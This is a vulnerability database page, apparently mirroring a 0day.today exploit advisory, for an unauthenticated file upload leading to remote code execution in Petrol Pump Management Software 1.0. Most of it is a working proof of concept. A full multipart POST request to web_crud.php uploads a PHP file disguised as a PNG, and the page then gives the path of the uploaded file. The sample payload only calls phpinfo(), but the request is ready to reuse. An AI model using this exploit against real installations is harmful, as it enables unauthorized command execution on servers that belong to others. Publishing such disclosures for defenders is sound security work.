Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtSoSPiro1337DAY-ID-39345
HistoryFeb 20, 2024 - 12:00 a.m.

Petrol Pump Management Software 1.0 Shell Upload Vulnerability

2024-02-2000:00:00
SoSPiro
0day.today
98
petrol pump management software
vulnerability
file upload
rce
unauthorized
command execution
windows 10
wampserver
security
web application
remote
exploit
video
proof of concept
php
developer
sourcecodester
website
version 1.0

7.4 High

AI Score

Confidence

Low

JSON
# Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated)
# Application: Petrol pump management software
# Date: 20.02.2024
# Bugs: File Upload Remote Code Execution (RCE) (unauthenticated)
# Exploit Author: SoSPiro
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: 1.0
# Tested on: Windows 10 64 bit Wampserver 
# CVE : N/A

## Vulnerability Description:

Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload 
files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder. 
This allows malicious individuals to execute unauthorized commands on the system.


## Staus: HIGH-CRITICAL Vulnerability


## Proof of Concept (PoC):

Video:
https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view



// File upload Request


POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085
Origin: http://localhost
Connection: close
Referer: http://localhost/zer/fuelflow/admin/web.php
Cookie: PHPSESSID=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="id"

1
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="old_photo1_img"

test.png
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="photo1"; filename="3.php"
Content-Type: image/png

<?php phpinfo();?>
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="title"

FuelFlow lite - Developed by Mayuri K. tessss
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="old_photos_img"

test.png
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="photos"; filename=""
Content-Type: application/octet-stream


-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="sitekey"

test
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="secretkey"

test
-----------------------------82750242321210078514140255085
Content-Disposition: form-data; name="update"


-----------------------------82750242321210078514140255085--






//  Phpinfo file locaton 

/zerday/fuelflow/assets/images/65d45a6080eca.php

7.4 High

AI Score

Confidence

Low

JSON